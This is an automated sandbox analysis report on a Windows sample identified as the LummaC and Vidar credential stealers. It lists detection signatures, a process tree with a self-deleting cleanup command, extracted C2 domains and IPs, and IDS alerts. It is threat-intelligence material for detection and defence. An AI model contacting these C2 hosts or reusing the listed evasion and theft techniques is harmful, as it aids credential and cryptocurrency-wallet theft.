Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1519747
MD5:	1992187cfdd036a0eecb8f5ca9340cc0
SHA1:	0aac664d9c06f47a970f88389401a14705337121
SHA256:	3a82cb00938ffbdf09c91c39120f57054df7573950701ce8be86aec0342bc1b5
Tags:	exeuser-Bitsight
Infos:

Detection

LummaC, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected Vidar

Yara detected Vidar stealer

.NET source code contains very large array initializations

.NET source code references suspicious native API functions

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to detect sandboxes (mouse cursor move detection)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 7408 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 1992187CFDD036A0EECB8F5CA9340CC0)

conhost.exe (PID: 7416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 7468 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 7476 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

CBFBKFIDHI.exe (PID: 8084 cmdline: "C:\ProgramData\CBFBKFIDHI.exe" MD5: 16F5B27C9E1376C17B03BF8C5090DB3C)

conhost.exe (PID: 8092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 8136 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

KJEHJKJEBG.exe (PID: 8188 cmdline: "C:\ProgramData\KJEHJKJEBG.exe" MD5: 2CCE29D734EA1D227B338834698E2DE4)

conhost.exe (PID: 6756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 5480 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 2256 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cmd.exe (PID: 1780 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BAECFHJEBAAF" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 2416 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ https://censys.com/a-beginners-guide-to-hunting-open-directories/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: LummaC

{"C2 url": ["gutterydhowi.shop", "stogeneratmns.shop", "offensivedzvju.shop", "fragnantbui.shop", "vozmeatillu.shop", "drawzhotdog.shop", "ghostreedmnu.shop", "reinforcenh.shop"], "Build id": "H8NgCl--"}

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "4b74261d834413e886f920a1e9dc5b33"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Vidar_2	Yara detected Vidar	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.2410755842.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp	HiddenCobra_BANKSHOT_Gen	Detects Hidden Cobra BANKSHOT trojan	Florian Roth	0x5df8e:$x5: vchost.exe 0x5ef8e:$x5: vchost.exe
00000007.00000002.2304480133.00000000040B5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.1680508466.0000000003725000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.1680508466.0000000003725000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: file.exe PID: 7408	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 7408	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 7408	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegAsm.exe PID: 7476	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 7476	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: RegAsm.exe PID: 7476	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 7476	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegAsm.exe PID: 2256	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 2256	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 15 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.RegAsm.exe.43f8e0.1.unpack	HiddenCobra_BANKSHOT_Gen	Detects Hidden Cobra BANKSHOT trojan	Florian Roth	0x1c2ae:$x5: vchost.exe
9.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
3.2.RegAsm.exe.43f8e0.1.raw.unpack	HiddenCobra_BANKSHOT_Gen	Detects Hidden Cobra BANKSHOT trojan	Florian Roth	0x1e6ae:$x5: vchost.exe 0x1f6ae:$x5: vchost.exe
9.2.RegAsm.exe.400000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
3.2.RegAsm.exe.43dcd8.2.raw.unpack	HiddenCobra_BANKSHOT_Gen	Detects Hidden Cobra BANKSHOT trojan	Florian Roth	0x202b6:$x5: vchost.exe 0x212b6:$x5: vchost.exe
3.2.RegAsm.exe.400000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
3.2.RegAsm.exe.400000.0.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0.2.file.exe.3725570.2.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.file.exe.3725570.2.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
3.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
3.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
3.2.RegAsm.exe.400000.0.raw.unpack	HiddenCobra_BANKSHOT_Gen	Detects Hidden Cobra BANKSHOT trojan	Florian Roth	0x5df8e:$x5: vchost.exe 0x5ef8e:$x5: vchost.exe
0.2.file.exe.3725570.2.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.file.exe.3725570.2.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 9 entries

Suricata Signatures

ET JA3 Hash - [Abuse.ch] Possible Dridex

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T22:56:23.567077+0200	2028765	3	Unknown Traffic	192.168.2.4	49740	5.75.211.162	443	TCP
2024-09-26T22:56:24.747271+0200	2028765	3	Unknown Traffic	192.168.2.4	49741	5.75.211.162	443	TCP
2024-09-26T22:56:26.105780+0200	2028765	3	Unknown Traffic	192.168.2.4	49742	5.75.211.162	443	TCP
2024-09-26T22:56:27.449625+0200	2028765	3	Unknown Traffic	192.168.2.4	49743	5.75.211.162	443	TCP
2024-09-26T22:56:28.822983+0200	2028765	3	Unknown Traffic	192.168.2.4	49744	5.75.211.162	443	TCP
2024-09-26T22:56:30.300117+0200	2028765	3	Unknown Traffic	192.168.2.4	49745	5.75.211.162	443	TCP
2024-09-26T22:56:31.277610+0200	2028765	3	Unknown Traffic	192.168.2.4	49746	5.75.211.162	443	TCP
2024-09-26T22:56:34.220784+0200	2028765	3	Unknown Traffic	192.168.2.4	49747	5.75.211.162	443	TCP
2024-09-26T22:56:35.344354+0200	2028765	3	Unknown Traffic	192.168.2.4	49748	5.75.211.162	443	TCP
2024-09-26T22:56:36.341020+0200	2028765	3	Unknown Traffic	192.168.2.4	49749	5.75.211.162	443	TCP
2024-09-26T22:56:37.437965+0200	2028765	3	Unknown Traffic	192.168.2.4	49750	5.75.211.162	443	TCP
2024-09-26T22:56:38.458217+0200	2028765	3	Unknown Traffic	192.168.2.4	49751	5.75.211.162	443	TCP
2024-09-26T22:56:40.192353+0200	2028765	3	Unknown Traffic	192.168.2.4	49752	5.75.211.162	443	TCP
2024-09-26T22:56:41.898999+0200	2028765	3	Unknown Traffic	192.168.2.4	49753	5.75.211.162	443	TCP
2024-09-26T22:56:43.603323+0200	2028765	3	Unknown Traffic	192.168.2.4	49754	5.75.211.162	443	TCP
2024-09-26T22:56:45.057746+0200	2028765	3	Unknown Traffic	192.168.2.4	49755	5.75.211.162	443	TCP
2024-09-26T22:56:46.333681+0200	2028765	3	Unknown Traffic	192.168.2.4	49756	5.75.211.162	443	TCP
2024-09-26T22:56:49.347329+0200	2028765	3	Unknown Traffic	192.168.2.4	49757	5.75.211.162	443	TCP
2024-09-26T22:56:50.627775+0200	2028765	3	Unknown Traffic	192.168.2.4	49758	5.75.211.162	443	TCP
2024-09-26T22:56:52.001194+0200	2028765	3	Unknown Traffic	192.168.2.4	49759	5.75.211.162	443	TCP
2024-09-26T22:56:53.458904+0200	2028765	3	Unknown Traffic	192.168.2.4	49760	5.75.211.162	443	TCP
2024-09-26T22:56:55.656523+0200	2028765	3	Unknown Traffic	192.168.2.4	49762	5.75.211.162	443	TCP
2024-09-26T22:56:57.733357+0200	2028765	3	Unknown Traffic	192.168.2.4	49763	5.75.211.162	443	TCP
2024-09-26T22:57:02.015989+0200	2028765	3	Unknown Traffic	192.168.2.4	49765	5.75.211.162	443	TCP
2024-09-26T22:57:06.382162+0200	2028765	3	Unknown Traffic	192.168.2.4	49771	5.75.211.162	443	TCP
2024-09-26T22:57:07.984312+0200	2028765	3	Unknown Traffic	192.168.2.4	49774	5.75.211.162	443	TCP
2024-09-26T22:57:29.615143+0200	2028765	3	Unknown Traffic	192.168.2.4	49782	5.75.211.162	443	TCP
2024-09-26T22:57:30.899136+0200	2028765	3	Unknown Traffic	192.168.2.4	49783	5.75.211.162	443	TCP
2024-09-26T22:57:32.331447+0200	2028765	3	Unknown Traffic	192.168.2.4	49784	5.75.211.162	443	TCP
2024-09-26T22:57:33.711767+0200	2028765	3	Unknown Traffic	192.168.2.4	49785	5.75.211.162	443	TCP
2024-09-26T22:57:35.225489+0200	2028765	3	Unknown Traffic	192.168.2.4	49786	5.75.211.162	443	TCP
2024-09-26T22:57:36.654526+0200	2028765	3	Unknown Traffic	192.168.2.4	49787	5.75.211.162	443	TCP
2024-09-26T22:57:37.661721+0200	2028765	3	Unknown Traffic	192.168.2.4	49788	5.75.211.162	443	TCP
2024-09-26T22:57:41.103671+0200	2028765	3	Unknown Traffic	192.168.2.4	49789	5.75.211.162	443	TCP
2024-09-26T22:57:42.152448+0200	2028765	3	Unknown Traffic	192.168.2.4	49790	5.75.211.162	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T22:57:02.783878+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49766	188.114.97.3	443	TCP
2024-09-26T22:57:03.786553+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49767	104.21.4.136	443	TCP
2024-09-26T22:57:04.756523+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49769	188.114.97.3	443	TCP
2024-09-26T22:57:05.687946+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49770	188.114.96.3	443	TCP
2024-09-26T22:57:06.626521+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49772	188.114.96.3	443	TCP
2024-09-26T22:57:07.548529+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49773	104.21.58.182	443	TCP
2024-09-26T22:57:08.492424+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49775	188.114.97.3	443	TCP
2024-09-26T22:57:09.475967+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49776	188.114.97.3	443	TCP
2024-09-26T22:57:11.883088+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49780	104.21.2.13	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T22:57:02.783878+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49766	188.114.97.3	443	TCP
2024-09-26T22:57:03.786553+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49767	104.21.4.136	443	TCP
2024-09-26T22:57:04.756523+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49769	188.114.97.3	443	TCP
2024-09-26T22:57:05.687946+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49770	188.114.96.3	443	TCP
2024-09-26T22:57:06.626521+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49772	188.114.96.3	443	TCP
2024-09-26T22:57:07.548529+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49773	104.21.58.182	443	TCP
2024-09-26T22:57:08.492424+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49775	188.114.97.3	443	TCP
2024-09-26T22:57:09.475967+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49776	188.114.97.3	443	TCP
2024-09-26T22:57:11.883088+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49780	104.21.2.13	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawzhotdog .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T22:57:07.110098+0200	2056157	1	Domain Observed Used for C2 Detected	192.168.2.4	49773	104.21.58.182	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (fragnantbui .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T22:57:08.055401+0200	2056155	1	Domain Observed Used for C2 Detected	192.168.2.4	49775	188.114.97.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T22:57:02.153778+0200	2056163	1	Domain Observed Used for C2 Detected	192.168.2.4	49766	188.114.97.3	443	TCP
2024-09-26T22:57:04.310613+0200	2056163	1	Domain Observed Used for C2 Detected	192.168.2.4	49769	188.114.97.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T22:57:03.290531+0200	2056165	1	Domain Observed Used for C2 Detected	192.168.2.4	49767	104.21.4.136	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (offensivedzvju .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T22:57:05.243104+0200	2056161	1	Domain Observed Used for C2 Detected	192.168.2.4	49770	188.114.96.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (reinforcenh .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T22:57:09.634096+0200	2056151	1	Domain Observed Used for C2 Detected	192.168.2.4	49778	104.21.77.130	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (stogeneratmns .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T22:57:09.000036+0200	2056153	1	Domain Observed Used for C2 Detected	192.168.2.4	49776	188.114.97.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (vozmeatillu .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T22:57:06.195111+0200	2056159	1	Domain Observed Used for C2 Detected	192.168.2.4	49772	188.114.96.3	443	TCP

ET MALWARE Vidar Stealer Form Exfil

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T22:57:09.490053+0200	2054495	1	A Network Trojan was detected	192.168.2.4	49777	45.132.206.251	80	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawzhotdog .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T22:57:06.633807+0200	2056156	1	Domain Observed Used for C2 Detected	192.168.2.4	65079	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fragnantbui .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T22:57:07.550566+0200	2056154	1	Domain Observed Used for C2 Detected	192.168.2.4	58978	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T22:57:01.653633+0200	2056162	1	Domain Observed Used for C2 Detected	192.168.2.4	62072	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T22:57:02.799926+0200	2056164	1	Domain Observed Used for C2 Detected	192.168.2.4	59039	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (offensivedzvju .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T22:57:04.760066+0200	2056160	1	Domain Observed Used for C2 Detected	192.168.2.4	51028	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (reinforcenh .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T22:57:09.478147+0200	2056150	1	Domain Observed Used for C2 Detected	192.168.2.4	54407	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stogeneratmns .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T22:57:08.494271+0200	2056152	1	Domain Observed Used for C2 Detected	192.168.2.4	49207	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vozmeatillu .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T22:57:05.702968+0200	2056158	1	Domain Observed Used for C2 Detected	192.168.2.4	60650	1.1.1.1	53	UDP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T22:56:28.150686+0200	2044247	1	Malware Command and Control Activity Detected	5.75.211.162	443	192.168.2.4	49743	TCP
2024-09-26T22:57:34.553766+0200	2044247	1	Malware Command and Control Activity Detected	5.75.211.162	443	192.168.2.4	49785	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T22:56:29.540812+0200	2051831	1	Malware Command and Control Activity Detected	5.75.211.162	443	192.168.2.4	49744	TCP
2024-09-26T22:57:35.926718+0200	2051831	1	Malware Command and Control Activity Detected	5.75.211.162	443	192.168.2.4	49786	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T22:56:28.150484+0200	2049087	1	A Network Trojan was detected	192.168.2.4	49743	5.75.211.162	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T22:57:00.179670+0200	2803270	2	Potentially Bad Traffic	192.168.2.4	49764	172.105.54.160	443	TCP
2024-09-26T22:57:04.512064+0200	2803270	2	Potentially Bad Traffic	192.168.2.4	49768	172.105.54.160	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://steamcommunity.com/profiles/76561199724331900	URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900/inventory/	URL Reputation: Label: malware
Source: stogeneratmns.shop	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/sqlp.dllI	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/sqlp.dllJ	Avira URL Cloud: Label: malware
Source: https://offensivedzvju.shop/apir	Avira URL Cloud: Label: malware
Source: https://vozmeatillu.shop/$	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: https://reinforcenh.shop/api	Avira URL Cloud: Label: malware
Source: https://fragnantbui.shop/	Avira URL Cloud: Label: malware
Source: https://stogeneratmns.shop/	Avira URL Cloud: Label: malware
Source: fragnantbui.shop	Avira URL Cloud: Label: malware
Source: offensivedzvju.shop	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/msvcp140.dll0G	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/mozglue.dllD	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/freebl3.dllrDH	Avira URL Cloud: Label: malware
Source: https://offensivedzvju.shop/~	Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199780418869/inventory/	Avira URL Cloud: Label: malware
Source: https://offensivedzvju.shop/pi	Avira URL Cloud: Label: malware
Source: https://reinforcenh.shop//	Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199780418869	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/softokn3.dll	Avira URL Cloud: Label: malware
Source: https://stogeneratmns.shop/api	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/HJEBKJEGH	Avira URL Cloud: Label: malware
Source: https://ghostreedmnu.shop/api	Avira URL Cloud: Label: malware
Source: https://ghostreedmnu.shop/apiY	Avira URL Cloud: Label: malware
Source: https://reinforcenh.shop/l	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/	Avira URL Cloud: Label: malware
Source: https://fragnantbui.shop/apiU	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/mozglue.dll	Avira URL Cloud: Label: malware
Source: reinforcenh.shop	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "4b74261d834413e886f920a1e9dc5b33"}
Source: 9.2.RegAsm.exe.400000.0.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["gutterydhowi.shop", "stogeneratmns.shop", "offensivedzvju.shop", "fragnantbui.shop", "vozmeatillu.shop", "drawzhotdog.shop", "ghostreedmnu.shop", "reinforcenh.shop"], "Build id": "H8NgCl--"}

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\CBFBKFIDHI.exe	ReversingLabs: Detection: 39%
Source: C:\ProgramData\KJEHJKJEBG.exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\ljhgfsd[1].exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vdshfd[1].exe	ReversingLabs: Detection: 34%

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 44%

AI detected suspicious sample

Source: Submited Sample

